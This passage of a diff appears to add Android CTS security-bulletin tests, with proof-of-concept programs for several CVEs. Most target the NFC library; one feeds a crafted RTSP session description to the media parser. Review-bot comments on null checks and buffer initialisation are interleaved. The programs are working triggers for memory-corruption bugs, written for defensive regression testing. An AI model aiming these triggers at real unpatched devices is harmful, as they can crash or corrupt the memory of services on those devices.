*kAllocatedPointers[2]; +int allocatedPointersIndex = -1; +bool kIsInitialized = false; + +void init(void) { + real_GKI_freebuf = (void (*)(void*))dlsym(RTLD_NEXT, "_Z11GKI_freebufPv"); + if (!real_GKI_freebuf) { + return; + } + + kIsInitialized = true; +} + +void GKI_freebuf(void* ptr) { + if (!kIsInitialized) { + init(); + } + if (ptr == kAllocatedPointers[0] || ptr == kAllocatedPointers[1]) { + return; + } else { + real_GKI_freebuf(ptr); + } +} + +void *allocate_memory(size_t size) { + void *ptr = malloc(size); + memset(ptr, 0x0, size); + kAllocatedPointers[++allocatedPointersIndex] = ptr; + return ptr; +} + +// borrowed from rw_i93.cc +enum { + RW_T3T_CMD_DETECT_NDEF, + RW_T3T_CMD_CHECK_NDEF, + RW_T3T_CMD_UPDATE_NDEF, + RW_T3T_CMD_CHECK, + RW_T3T_CMD_UPDATE, + RW_T3T_CMD_SEND_RAW_FRAME, + RW_T3T_CMD_GET_SYSTEM_CODES, + RW_T3T_CMD_FORMAT, + 
RW_T3T_CMD_SET_READ_ONLY_SOFT, + RW_T3T_CMD_SET_READ_ONLY_HARD, + + RW_T3T_CMD_MAX +}; + +// borrowed from rw_i93.cc +enum { + RW_T3T_STATE_NOT_ACTIVATED, + RW_T3T_STATE_IDLE, + RW_T3T_STATE_COMMAND_PENDING +}; + +// borrowed from rw_i93.cc +enum { + /* Sub states for formatting Felica-Lite */ + RW_T3T_FMT_SST_POLL_FELICA_LITE, /* Waiting for POLL Felica-Lite response (for + formatting) */ + RW_T3T_FMT_SST_CHECK_MC_BLK, /* Waiting for Felica-Lite MC (MemoryControl) + block-read to complete */ + RW_T3T_FMT_SST_UPDATE_MC_BLK, /* Waiting for Felica-Lite MC (MemoryControl) + block-write to complete */ + RW_T3T_FMT_SST_UPDATE_NDEF_ATTRIB, /* Waiting for NDEF attribute block-write + to complete */ + + /* Sub states for setting Felica-Lite read only */ + RW_T3T_SRO_SST_POLL_FELICA_LITE, /* Waiting for POLL Felica-Lite response (for + setting read only) */ + RW_T3T_SRO_SST_UPDATE_NDEF_ATTRIB, /* Waiting for NDEF attribute block-write + to complete */ + RW_T3T_SRO_SST_CHECK_MC_BLK, /* Waiting for Felica-Lite MC (MemoryControl) + block-read to complete */ + RW_T3T_SRO_SST_UPDATE_MC_BLK /* Waiting for Felica-Lite MC (MemoryControl) + block-write to complete */ +}; + +void cback(uint8_t c __attribute__((unused)), + tRW_DATA* d __attribute__((unused))) { +} + +int main() { + + enable_selective_overload = ENABLE_ALL; + tRW_T3T_CB* p_t3t = &rw_cb.tcb.t3t; + + GKI_init(); + rw_init(); + + uint8_t peer_nfcid2[NCI_RF_F_UID_LEN]; + uint8_t mrti_check = 1, mrti_update = 1; + if (rw_t3t_select(peer_nfcid2, mrti_check, mrti_update) != NFC_STATUS_OK) { + return EXIT_FAILURE; + } + + tNFC_CONN *p_data = (tNFC_CONN *) allocate_memory(sizeof(tNFC_CONN)); + if (!p_data) { + return EXIT_FAILURE; + } + p_data->data.p_data = (NFC_HDR *) allocate_memory(sizeof(NFC_HDR) * 4); + if (!(p_data->data.p_data)) { + free(p_data); + return EXIT_FAILURE; + } + p_data->status = NFC_STATUS_OK; + + p_t3t->cur_cmd = RW_T3T_CMD_SET_READ_ONLY_HARD; + p_t3t->rw_state = RW_T3T_STATE_COMMAND_PENDING; + 
p_t3t->rw_substate = RW_T3T_SRO_SST_CHECK_MC_BLK; + + NFC_HDR* p_msg = (p_data->data).p_data; + p_msg->len = T3T_MSG_RSP_COMMON_HDR_LEN; + + uint8_t* p_t3t_rsp = (uint8_t*) (p_msg + 1) + (p_msg->offset + 1); + p_t3t_rsp[T3T_MSG_RSP_OFFSET_RSPCODE] = T3T_MSG_OPC_CHECK_RSP; + p_t3t_rsp[T3T_MSG_RSP_OFFSET_STATUS1] = T3T_MSG_RSP_STATUS_OK; + + uint8_t* p_mc = &p_t3t_rsp[T3T_MSG_RSP_OFFSET_CHECK_DATA]; + p_mc[T3T_MSG_FELICALITE_MC_OFFSET_SYS_OP] = T3T_MSG_FELICALITE_MC_OFFSET; + + tNFC_CONN_CB* p_cb = &nfc_cb.conn_cb[NFC_RF_CONN_ID]; + tNFC_CONN_EVT event = NFC_DATA_CEVT; + TIMER_LIST_ENT pFirst = { }; + nfc_cb.quick_timer_queue.p_first = &pFirst; + + rw_cb.p_cback = &cback; + p_cb->p_cback(0, event, p_data); + + free(p_data->data.p_data); + free(p_data); + + enable_selective_overload = ENABLE_NONE; + return EXIT_SUCCESS; +} diff --git a/hostsidetests/securitybulletin/securityPatch/CVE-2019-2014/Android.bp b/hostsidetests/securitybulletin/securityPatch/CVE-2019-2014/Android.bp new file mode 100644 index 00000000000..b5a7b9969ca --- /dev/null +++ b/hostsidetests/securitybulletin/securityPatch/CVE-2019-2014/Android.bp 
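Review bot: `allocate_memory()` calls `memset(ptr, 0x0, size)` before anything has checked `ptr`, so the `if (!p_data)` and `if (!(p_data->data.p_data))` tests in `main()` can never catch an allocation failure; add `if (!ptr) return nullptr;` ahead of the `memset`. The helper also stores into `kAllocatedPointers[++allocatedPointersIndex]` with no bound on the two-element array. In the `GKI_freebuf` override, `real_GKI_freebuf(ptr)` is still called when `dlsym` failed and left the pointer null, so guard that call with `if (real_GKI_freebuf)`. The three `// borrowed from rw_i93.cc` comments sit above `RW_T3T_*` enums, so the file name looks wrong there and is presumably meant to be rw_t3t.cc.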
@@ -0,0 +1,34 @@
+/*
+ * Copyright (C) 2021 The Android Open Source Project
+ *
+ * Licensed under the Apache License, Version 2.0 (the "License");
+ * you may not use this file except in compliance with the License.
+ * You may obtain a copy of the License at:
+ *
+ * http://www.apache.org/licenses/LICENSE-2.0
+ *
+ * Unless required by applicable law or agreed to in writing, software
+ * distributed under the License is distributed on an "AS IS" BASIS,
+ * WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
+ * See the License for the specific language governing permissions and
+ * limitations under the License.
+ *
+ */
+
+cc_test {
+ name: "CVE-2019-2014",
+ defaults: ["cts_hostsidetests_securitybulletin_defaults"],
+ srcs: [
+ "poc.cpp",
+ ],
+ compile_multilib: "64",
+ include_dirs: [
+ "system/nfc/src/include",
+ "system/nfc/src/gki/common",
+ "system/nfc/src/nfc/include",
+ "system/nfc/src/gki/ulinux/",
+ ],
+ shared_libs: [
+ "libnfc-nci",
+ ],
+}
diff --git a/hostsidetests/securitybulletin/securityPatch/CVE-2019-2014/poc.cpp b/hostsidetests/securitybulletin/securityPatch/CVE-2019-2014/poc.cpp
new file mode 100644
index 00000000000..26c607e9865
--- /dev/null
+++ b/hostsidetests/securitybulletin/securityPatch/CVE-2019-2014/poc.cpp
@@ -0,0 +1,60 @@ +/* + * Copyright (C) 2021 The Android Open Source Project + * + * Licensed under the Apache License, Version 2.0 (the "License"); + * you may not use this file except in compliance with the License. + * You may obtain a copy of the License at + * + * http://www.apache.org/licenses/LICENSE-2.0 + * + * Unless required by applicable law or agreed to in writing, software + * distributed under the License is distributed on an "AS IS" BASIS, + * WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. + * See the License for the specific language governing permissions and + * limitations under the License. + */ + +#include <rw_int.h> +#include <stdlib.h> + +#include "../includes/common.h" + +// borrowed from rw_t3t.cc +#define RW_T3T_SENSF_RES_RD_OFFSET 17 +#define RW_T3T_SENSF_RES_RD_LEN 2 +#define DEFAULT_VALUE 0xBE + +extern tRW_CB rw_cb; +void rw_init(void); +void cback(uint8_t, tRW_DATA *) {} + +void GKI_start_timer(uint8_t, int32_t, bool) {} + +void GKI_stop_timer(uint8_t) {} + +int main() { + tRW_T3T_CB *p_cb = &rw_cb.tcb.t3t; + + GKI_init(); + rw_init(); + rw_cb.p_cback = &cback; + + for (int n = 0; n < NCI_NFCID2_LEN; ++n) { + p_cb->peer_nfcid2[n] = DEFAULT_VALUE; + } + + p_cb->num_system_codes = T3T_MAX_SYSTEM_CODES; + p_cb->flags = RW_T3T_FL_W4_GET_SC_POLL_RSP; + + uint8_t nci_status = NCI_STATUS_OK; + uint8_t num_responses = 1; + uint8_t sensf_res_buf_size = + RW_T3T_SENSF_RES_RD_OFFSET + RW_T3T_SENSF_RES_RD_LEN; + uint8_t *p_sensf_res_buf = + (uint8_t *)malloc(RW_T3T_SENSF_RES_RD_OFFSET + RW_T3T_SENSF_RES_RD_LEN); + rw_t3t_handle_nci_poll_ntf(nci_status, num_responses, sensf_res_buf_size, + p_sensf_res_buf); + + free(p_sensf_res_buf); + return EXIT_SUCCESS; +} diff --git a/hostsidetests/securitybulletin/securityPatch/CVE-2019-2019/Android.bp b/hostsidetests/securitybulletin/securityPatch/CVE-2019-2019/Android.bp new file mode 100644 index 00000000000..fe6619120ad --- /dev/null 
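Review bot: The buffer returned by `malloc` near the end of `main()` is neither NULL-checked nor initialised before it goes to `rw_t3t_handle_nci_poll_ntf()`, so the handler parses indeterminate heap bytes and a failed allocation is passed straight through. Add `if (!p_sensf_res_buf) return EXIT_FAILURE;` and fill the buffer, e.g. `memset(p_sensf_res_buf, DEFAULT_VALUE, sensf_res_buf_size);` with `<string.h>` included; the fill value is the author's choice. The `malloc` size should also reuse `sensf_res_buf_size` instead of repeating the sum, so the length passed to the handler and the allocated size cannot drift apart.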
+++ b/hostsidetests/securitybulletin/securityPatch/CVE-2019-2019/Android.bp
@@ -0,0 +1,38 @@
+/*
+ * Copyright (C) 2021 The Android Open Source Project
+ *
+ * Licensed under the Apache License, Version 2.0 (the "License");
+ * you may not use this file except in compliance with the License.
+ * You may obtain a copy of the License at:
+ *
+ * http://www.apache.org/licenses/LICENSE-2.0
+ *
+ * Unless required by applicable law or agreed to in writing, software
+ * distributed under the License is distributed on an "AS IS" BASIS,
+ * WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
+ * See the License for the specific language governing permissions and
+ * limitations under the License.
+ *
+ */
+
+cc_test {
+ name: "CVE-2019-2019",
+ defaults: ["cts_hostsidetests_securitybulletin_defaults"],
+ srcs: [
+ "poc.cpp",
+ ":cts_hostsidetests_securitybulletin_memutils",
+ ],
+ cflags: [
+ "-DCHECK_OVERFLOW",
+ "-DENABLE_SELECTIVE_OVERLOADING",
+ ],
+ include_dirs: [
+ "system/nfc/src/include/",
+ "system/nfc/src/gki/common/",
+ "system/nfc/src/gki/ulinux/",
+ "system/nfc/src/nfc/include/",
+ ],
+ shared_libs: [
+ "libnfc-nci",
+ ],
+}
diff --git a/hostsidetests/securitybulletin/securityPatch/CVE-2019-2019/poc.cpp b/hostsidetests/securitybulletin/securityPatch/CVE-2019-2019/poc.cpp
new file mode 100644
index 00000000000..483b7c45c7a
--- /dev/null
+++ b/hostsidetests/securitybulletin/securityPatch/CVE-2019-2019/poc.cpp
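Review bot: This module has no `compile_multilib: "64"`, while the other `libnfc-nci` test modules visible in this change (CVE-2018-9558, CVE-2018-9561, CVE-2019-2013, CVE-2019-2014, CVE-2019-2035 and the rest) all set it. If building this test for both ABIs is intended, a one-line comment saying so would stop the next reader from treating it as an omission. Otherwise add `compile_multilib: "64",` after the `cflags` list so the module matches its siblings.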
@@ -0,0 +1,65 @@
+/*
+ * Copyright (C) 2021 The Android Open Source Project
+ *
+ * Licensed under the Apache License, Version 2.0 (the "License");
+ * you may not use this file except in compliance with the License.
+ * You may obtain a copy of the License at
+ *
+ * http://www.apache.org/licenses/LICENSE-2.0
+ *
+ * Unless required by applicable law or agreed to in writing, software
+ * distributed under the License is distributed on an "AS IS" BASIS,
+ * WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
+ * See the License for the specific language governing permissions and
+ * limitations under the License.
+ */
+
+#include <ce_int.h>
+#include <nfc_int.h>
+
+#include "../includes/common.h"
+#include "../includes/memutils.h"
+
+#define OFFSET 8
+#define VULNERABLE_LENGTH 0
+
+char enable_selective_overload = ENABLE_NONE;
+
+extern tNFC_CB nfc_cb;
+extern tCE_CB ce_cb;
+
+void GKI_freebuf(void* p_buf __attribute__((unused))) {}
+
+void nfc_start_quick_timer(TIMER_LIST_ENT*, uint16_t, uint32_t) {}
+
+void nfc_stop_timer(TIMER_LIST_ENT*) {}
+
+void nfc_stop_quick_timer(TIMER_LIST_ENT*) {}
+
+int main() {
+ enable_selective_overload = ENABLE_ALL;
+ GKI_init();
+ ce_init();
+ ce_cb.mem.t4t.status = CE_T4T_STATUS_REG_AID_SELECTED;
+
+ if (ce_select_t4t() != NFC_STATUS_OK) {
+ return EXIT_FAILURE;
+ }
+
+ tNFC_CONN_CB* p_cb = &nfc_cb.conn_cb[NFC_RF_CONN_ID];
+ tNFC_CONN* p_data = (tNFC_CONN*)malloc(sizeof(tNFC_CONN));
+ p_data->data.p_data = (NFC_HDR*)malloc(sizeof(uint8_t) * 16);
+ NFC_HDR* p_c_apdu = (NFC_HDR*)p_data->data.p_data;
+ p_c_apdu->len = VULNERABLE_LENGTH;
+ p_c_apdu->offset = OFFSET;
+ uint8_t conn_id = 1;
+ TIMER_LIST_ENT pFirst = {};
+ nfc_cb.quick_timer_queue.p_first = &pFirst;
+
+ p_cb->p_cback(conn_id, NFC_DATA_CEVT, p_data);
+
+ free(p_data->data.p_data);
+ free(p_data);
+ enable_selective_overload = ENABLE_NONE;
+ return EXIT_SUCCESS;
+}
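Review bot: Neither `malloc` in `main()` is checked before use: `p_data->data.p_data` is assigned through a possibly null `p_data`, and `p_c_apdu->len` is written through a possibly null header. The CVE-2019-2035 poc.cpp in this same change guards both allocations, and this file should do the same so that an out-of-memory run ends in `EXIT_FAILURE` instead of a crash, which these tests presumably treat as the vulnerable signal. `p_data->status` is also left unset here, whereas the CVE-2019-2013 and CVE-2019-2035 tests set it to `NFC_STATUS_OK` before invoking the callback; whether the T4T callback reads it is not visible from this hunk.

```cpp
  tNFC_CONN* p_data = (tNFC_CONN*)malloc(sizeof(tNFC_CONN));
  if (!p_data) {
    return EXIT_FAILURE;
  }
  p_data->data.p_data = (NFC_HDR*)malloc(sizeof(uint8_t) * 16);
  if (!(p_data->data.p_data)) {
    free(p_data);
    return EXIT_FAILURE;
  }
  // … unchanged: p_c_apdu setup, quick timer queue, p_cback call, cleanup …
```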
diff --git a/hostsidetests/securitybulletin/securityPatch/CVE-2019-2035/Android.bp b/hostsidetests/securitybulletin/securityPatch/CVE-2019-2035/Android.bp
new file mode 100644
index 00000000000..bd2504eeec2
--- /dev/null
+++ b/hostsidetests/securitybulletin/securityPatch/CVE-2019-2035/Android.bp
@@ -0,0 +1,38 @@
+/*
+ * Copyright (C) 2021 The Android Open Source Project
+ *
+ * Licensed under the Apache License, Version 2.0 (the "License");
+ * you may not use this file except in compliance with the License.
+ * You may obtain a copy of the License at:
+ *
+ * http://www.apache.org/licenses/LICENSE-2.0
+ *
+ * Unless required by applicable law or agreed to in writing, software
+ * distributed under the License is distributed on an "AS IS" BASIS,
+ * WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
+ * See the License for the specific language governing permissions and
+ * limitations under the License.
+ *
+ */
+
+cc_test {
+ name: "CVE-2019-2035",
+ defaults: ["cts_hostsidetests_securitybulletin_defaults"],
+ srcs: [
+ "poc.cpp",
+ ":cts_hostsidetests_securitybulletin_memutils",
+ ],
+ cflags: [
+ "-DCHECK_OVERFLOW",
+ ],
+ compile_multilib: "64",
+ include_dirs: [
+ "system/nfc/src/include",
+ "system/nfc/src/gki/common",
+ "system/nfc/src/nfc/include",
+ "system/nfc/src/gki/ulinux/",
+ ],
+ shared_libs: [
+ "libnfc-nci",
+ ],
+}
diff --git a/hostsidetests/securitybulletin/securityPatch/CVE-2019-2035/poc.cpp b/hostsidetests/securitybulletin/securityPatch/CVE-2019-2035/poc.cpp
new file mode 100644
index 00000000000..a5dfb299c72
--- /dev/null
+++ b/hostsidetests/securitybulletin/securityPatch/CVE-2019-2035/poc.cpp
@@ -0,0 +1,111 @@ +/* + * Copyright (C) 2021 The Android Open Source Project + * + * Licensed under the Apache License, Version 2.0 (the "License"); + * you may not use this file except in compliance with the License. + * You may obtain a copy of the License at + * + * http://www.apache.org/licenses/LICENSE-2.0 + * + * Unless required by applicable law or agreed to in writing, software + * distributed under the License is distributed on an "AS IS" BASIS, + * WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. + * See the License for the specific language governing permissions and + * limitations under the License. + */ + +#include <stdlib.h> +#include <rw_int.h> +#include <nfc_int.h> + +extern tRW_CB rw_cb; +extern tNFC_CB nfc_cb; +void rw_init(void); +tNFC_STATUS rw_i93_select(uint8_t* p_uid); + +// borrowed from rw_i93.cc +enum { + RW_I93_STATE_NOT_ACTIVATED, /* ISO15693 is not activated */ + RW_I93_STATE_IDLE, /* waiting for upper layer API */ + RW_I93_STATE_BUSY, /* waiting for response from tag */ + + RW_I93_STATE_DETECT_NDEF, /* performing NDEF detection precedure */ + RW_I93_STATE_READ_NDEF, /* performing read NDEF procedure */ + RW_I93_STATE_UPDATE_NDEF, /* performing update NDEF procedure */ + RW_I93_STATE_FORMAT, /* performing format procedure */ + RW_I93_STATE_SET_READ_ONLY, /* performing set read-only procedure */ + + RW_I93_STATE_PRESENCE_CHECK /* checking presence of tag */ +}; + +// borrowed from rw_i93.cc +enum { + RW_I93_SUBSTATE_WAIT_UID, /* waiting for response of inventory */ + RW_I93_SUBSTATE_WAIT_SYS_INFO, /* waiting for response of get sys info */ + RW_I93_SUBSTATE_WAIT_CC, /* waiting for reading CC */ + RW_I93_SUBSTATE_SEARCH_NDEF_TLV, /* searching NDEF TLV */ + RW_I93_SUBSTATE_CHECK_LOCK_STATUS, /* check if any NDEF TLV is locked */ + + RW_I93_SUBSTATE_RESET_LEN, /* set length to 0 to update NDEF TLV */ + RW_I93_SUBSTATE_WRITE_NDEF, /* writing NDEF and Terminator TLV */ + RW_I93_SUBSTATE_UPDATE_LEN, /* set length into 
NDEF TLV */ + + RW_I93_SUBSTATE_WAIT_RESET_DSFID_AFI, /* reset DSFID and AFI */ + RW_I93_SUBSTATE_CHECK_READ_ONLY, /* check if any block is locked */ + RW_I93_SUBSTATE_WRITE_CC_NDEF_TLV, /* write CC and empty NDEF/Terminator TLV + */ + + RW_I93_SUBSTATE_WAIT_UPDATE_CC, /* updating CC as read-only */ + RW_I93_SUBSTATE_LOCK_NDEF_TLV, /* lock blocks of NDEF TLV */ + RW_I93_SUBSTATE_WAIT_LOCK_CC /* lock block of CC */ +}; + +void GKI_freebuf(void*) { +} + +void GKI_start_timer(uint8_t, int32_t, bool) { +} + +void GKI_stop_timer(uint8_t) { +} + +int main() { + tRW_I93_CB* p_i93 = &rw_cb.tcb.i93; + + GKI_init(); + rw_init(); + + uint8_t p_uid = 1; + if (rw_i93_select(&p_uid) != NFC_STATUS_OK) { + return EXIT_FAILURE; + } + + tNFC_CONN_CB* p_cb = &nfc_cb.conn_cb[NFC_RF_CONN_ID]; + tNFC_CONN_EVT event = NFC_DATA_CEVT; + + tNFC_CONN *p_data = (tNFC_CONN *) malloc(sizeof(tNFC_CONN)); + if (!p_data) { + return EXIT_FAILURE; + } + + p_data->data.p_data = (NFC_HDR *) malloc(sizeof(uint8_t) * 32); + if (!(p_data->data.p_data)) { + free(p_data); + return EXIT_FAILURE; + } + + NFC_HDR *p_resp = (NFC_HDR*) p_data->data.p_data; + p_resp->len = 0; + p_resp->offset = 0; + + p_i93->state = RW_I93_STATE_UPDATE_NDEF; + p_i93->sub_state = RW_I93_SUBSTATE_RESET_LEN; + p_i93->block_size = 2 * (I93_MAX_BLOCK_LENGH + 1); + p_i93->ndef_tlv_start_offset = 2 * (I93_MAX_BLOCK_LENGH) - 1; + p_data->status = NFC_STATUS_OK; + + p_cb->p_cback(0, event, p_data); + free(p_data->data.p_data); + free(p_data); + return EXIT_SUCCESS; +} diff --git a/hostsidetests/securitybulletin/securityPatch/CVE-2019-2040/Android.bp b/hostsidetests/securitybulletin/securityPatch/CVE-2019-2040/Android.bp new file mode 100644 index 00000000000..942d552fd36 --- /dev/null +++ b/hostsidetests/securitybulletin/securityPatch/CVE-2019-2040/Android.bp 
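Review bot: The empty `GKI_freebuf`, `GKI_start_timer` and `GKI_stop_timer` definitions carry no comment saying why the test replaces them, and a blanket no-op `GKI_freebuf` also swallows every free the library itself performs during `rw_i93_select()` and the callback. A short comment above them, e.g. `// Stubbed so the callback cannot GKI-free the malloc'd p_data buffers or arm timers; main() frees them itself.`, would record the intent, which is inferred here from the `free()` calls at the end of `main()`. The CVE-2019-2013 test in this change limits its override to the pointers it allocated and forwards everything else, which is the narrower pattern if the stub stays.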
@@ -0,0 +1,38 @@
+/*
+ * Copyright (C) 2021 The Android Open Source Project
+ *
+ * Licensed under the Apache License, Version 2.0 (the "License");
+ * you may not use this file except in compliance with the License.
+ * You may obtain a copy of the License at:
+ *
+ * http://www.apache.org/licenses/LICENSE-2.0
+ *
+ * Unless required by applicable law or agreed to in writing, software
+ * distributed under the License is distributed on an "AS IS" BASIS,
+ * WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
+ * See the License for the specific language governing permissions and
+ * limitations under the License.
+ *
+ */
+
+cc_test {
+ name: "CVE-2019-2040",
+ defaults: ["cts_hostsidetests_securitybulletin_defaults"],
+ srcs: [
+ "poc.cpp",
+ ":cts_hostsidetests_securitybulletin_memutils",
+ ],
+ cflags: [
+ "-DCHECK_OVERFLOW",
+ ],
+ compile_multilib: "64",
+ include_dirs: [
+ "system/nfc/src/include",
+ "system/nfc/src/gki/common",
+ "system/nfc/src/nfc/include",
+ "system/nfc/src/gki/ulinux/",
+ ],
+ shared_libs: [
+ "libnfc-nci",
+ ],
+}
diff --git a/hostsidetests/securitybulletin/securityPatch/CVE-2019-2040/poc.cpp b/hostsidetests/securitybulletin/securityPatch/CVE-2019-2040/poc.cpp
new file mode 100644
index 00000000000..384c0859690
--- /dev/null
+++ b/hostsidetests/securitybulletin/securityPatch/CVE-2019-2040/poc.cpp
@@ -0,0 +1,112 @@ +/* + * Copyright (C) 2021 The Android Open Source Project + * + * Licensed under the Apache License, Version 2.0 (the "License"); + * you may not use this file except in compliance with the License. + * You may obtain a copy of the License at + * + * http://www.apache.org/licenses/LICENSE-2.0 + * + * Unless required by applicable law or agreed to in writing, software + * distributed under the License is distributed on an "AS IS" BASIS, + * WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. + * See the License for the specific language governing permissions and + * limitations under the License. + */ + +#include <nfc_api.h> +#include <nfc_int.h> +#include <rw_int.h> + +constexpr int kLength = 8; + +extern tRW_CB rw_cb; +extern tNFC_CB nfc_cb; +void rw_init(void); + +tNFC_STATUS rw_i93_select(uint8_t *p_uid); + +void GKI_start_timer(uint8_t, int32_t, bool) {} + +void GKI_stop_timer(uint8_t) {} + +// borrowed from rw_i93.cc +enum { + RW_I93_STATE_NOT_ACTIVATED, /* ISO15693 is not activated */ + RW_I93_STATE_IDLE, /* waiting for upper layer API */ + RW_I93_STATE_BUSY, /* waiting for response from tag */ + + RW_I93_STATE_DETECT_NDEF, /* performing NDEF detection precedure */ + RW_I93_STATE_READ_NDEF, /* performing read NDEF procedure */ + RW_I93_STATE_UPDATE_NDEF, /* performing update NDEF procedure */ + RW_I93_STATE_FORMAT, /* performing format procedure */ + RW_I93_STATE_SET_READ_ONLY, /* performing set read-only procedure */ + + RW_I93_STATE_PRESENCE_CHECK /* checking presence of tag */ +}; + +// borrowed from rw_i93.cc +enum { + RW_I93_SUBSTATE_WAIT_UID, /* waiting for response of inventory */ + RW_I93_SUBSTATE_WAIT_SYS_INFO, /* waiting for response of get sys info */ + RW_I93_SUBSTATE_WAIT_CC, /* waiting for reading CC */ + RW_I93_SUBSTATE_SEARCH_NDEF_TLV, /* searching NDEF TLV */ + RW_I93_SUBSTATE_CHECK_LOCK_STATUS, /* check if any NDEF TLV is locked */ + + RW_I93_SUBSTATE_RESET_LEN, /* set length to 0 to update NDEF TLV */ 
+ RW_I93_SUBSTATE_WRITE_NDEF, /* writing NDEF and Terminator TLV */ + RW_I93_SUBSTATE_UPDATE_LEN, /* set length into NDEF TLV */ + + RW_I93_SUBSTATE_WAIT_RESET_DSFID_AFI, /* reset DSFID and AFI */ + RW_I93_SUBSTATE_CHECK_READ_ONLY, /* check if any block is locked */ + RW_I93_SUBSTATE_WRITE_CC_NDEF_TLV, /* write CC and empty NDEF/Terminator TLV + */ + + RW_I93_SUBSTATE_WAIT_UPDATE_CC, /* updating CC as read-only */ + RW_I93_SUBSTATE_LOCK_NDEF_TLV, /* lock blocks of NDEF TLV */ + RW_I93_SUBSTATE_WAIT_LOCK_CC /* lock block of CC */ +}; + +void GKI_freebuf(void *p_buf __attribute__((unused))) {} + +int main() { + tRW_I93_CB *p_i93 = &rw_cb.tcb.i93; + + GKI_init(); + rw_init(); + + uint8_t p_uid = 1; + if (rw_i93_select(&p_uid) != NFC_STATUS_OK) { + return EXIT_FAILURE; + } + + tNFC_CONN_CB *p_cb = &nfc_cb.conn_cb[NFC_RF_CONN_ID]; + tNFC_CONN_EVT event = NFC_DATA_CEVT; + + tNFC_CONN *p_data = (tNFC_CONN *)malloc(sizeof(tNFC_CONN)); + if (!p_data) { + return EXIT_FAILURE; + } + + p_data->data.p_data = (NFC_HDR *)malloc(sizeof(uint8_t) * 16); + if (!(p_data->data.p_data)) { + free(p_data); + return EXIT_FAILURE; + } + + p_i93->state = RW_I93_STATE_BUSY; + p_i93->sub_state = RW_I93_SUBSTATE_CHECK_READ_ONLY; + p_i93->block_size = I93_MAX_BLOCK_LENGH - 1; + p_i93->sent_cmd = I93_CMD_EXT_GET_SYS_INFO; + p_data->status = NFC_STATUS_OK; + + NFC_HDR *p_resp = (NFC_HDR *)p_data->data.p_data; + p_resp->len = kLength; + p_resp->offset = 0; + + p_cb->p_cback(0, event, p_data); + free(p_data->data.p_data); + free(p_data); + + return EXIT_SUCCESS; +} diff --git a/hostsidetests/securitybulletin/securityPatch/CVE-2019-2044/Android.bp b/hostsidetests/securitybulletin/securityPatch/CVE-2019-2044/Android.bp new file mode 100644 index 00000000000..f516e6a6280 --- /dev/null +++ b/hostsidetests/securitybulletin/securityPatch/CVE-2019-2044/Android.bp 
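Review bot: The 16-byte response buffer comes from `malloc()` and only `len` and `offset` are written, so the `kLength` payload bytes that follow the `NFC_HDR` fields are indeterminate when `p_cb->p_cback` runs. The path taken through the response handler can therefore differ between runs. Allocating with `calloc(1, 16)`, or filling the payload explicitly before the callback, makes the test reproducible; the CVE-2019-2206 PoC leaves its payload uninitialised in the same way. `malloc` and `EXIT_FAILURE` are also used without a direct `#include <stdlib.h>`, relying on the NFC headers to pull it in.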
@@ -0,0 +1,37 @@
+/*
+ * Copyright (C) 2021 The Android Open Source Project
+ *
+ * Licensed under the Apache License, Version 2.0 (the "License");
+ * you may not use this file except in compliance with the License.
+ * You may obtain a copy of the License at:
+ *
+ * http://www.apache.org/licenses/LICENSE-2.0
+ *
+ * Unless required by applicable law or agreed to in writing, software
+ * distributed under the License is distributed on an "AS IS" BASIS,
+ * WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
+ * See the License for the specific language governing permissions and
+ * limitations under the License.
+ *
+ */
+
+cc_test {
+ name: "CVE-2019-2044",
+ defaults: ["cts_hostsidetests_securitybulletin_defaults"],
+ srcs: [
+ "poc.cpp",
+ ":cts_hostsidetests_securitybulletin_memutils",
+ ],
+ cflags: [
+ "-DCHECK_OVERFLOW",
+ ],
+ compile_multilib: "32",
+ include_dirs: [
+ "frameworks/av/media/libstagefright/rtsp/",
+ ],
+ shared_libs: [
+ "libmediaplayerservice",
+ "libstagefright_foundation",
+ "libutils",
+ ],
+}
diff --git a/hostsidetests/securitybulletin/securityPatch/CVE-2019-2044/poc.cpp b/hostsidetests/securitybulletin/securityPatch/CVE-2019-2044/poc.cpp
new file mode 100644
index 00000000000..e733c6f783c
--- /dev/null
+++ b/hostsidetests/securitybulletin/securityPatch/CVE-2019-2044/poc.cpp
@@ -0,0 +1,42 @@
+/*
+ * Copyright (C) 2021 The Android Open Source Project
+ *
+ * Licensed under the Apache License, Version 2.0 (the "License");
+ * you may not use this file except in compliance with the License.
+ * You may obtain a copy of the License at
+ *
+ * http://www.apache.org/licenses/LICENSE-2.0
+ *
+ * Unless required by applicable law or agreed to in writing, software
+ * distributed under the License is distributed on an "AS IS" BASIS,
+ * WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
+ * See the License for the specific language governing permissions and
+ * limitations under the License.
+ */
+#include <stdlib.h>
+#include <APacketSource.h>
+#include <ASessionDescription.h>
+
+using namespace android;
+
+int main(void) {
+ sp<ASessionDescription> desc = new ASessionDescription;
+ static const char *raw =
+ "m=mFormats 20\r\n"
+ "a=rtpmap:20 MP4V-ES/1/2\r\n"
+ "a=fmtp:20 config=0000012000004000280020008061616161616161616161616161"
+ "61616161616161616161616161616161616161616161616161616161616161616161"
+ "61616161616161616161616161616161616161616161616161616161616161616161"
+ "616161616161616161616161616161616161616161616161616161\r\n"
+ "a=range:npt=1.1-2.2\r\n"
+ "a=framesize:1-9 \r\n"
+ "a=control:abc\r\n"
+ "a=aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa\r\n";
+
+ if(!desc->setTo(raw, strlen(raw))) {
+ return EXIT_FAILURE;
+ }
+
+ sp<APacketSource> source = new APacketSource(desc, 1);
+ return EXIT_SUCCESS;
+}
diff --git a/hostsidetests/securitybulletin/securityPatch/CVE-2019-2099/Android.bp b/hostsidetests/securitybulletin/securityPatch/CVE-2019-2099/Android.bp
new file mode 100644
index 00000000000..85304bc0f01
--- /dev/null
+++ b/hostsidetests/securitybulletin/securityPatch/CVE-2019-2099/Android.bp
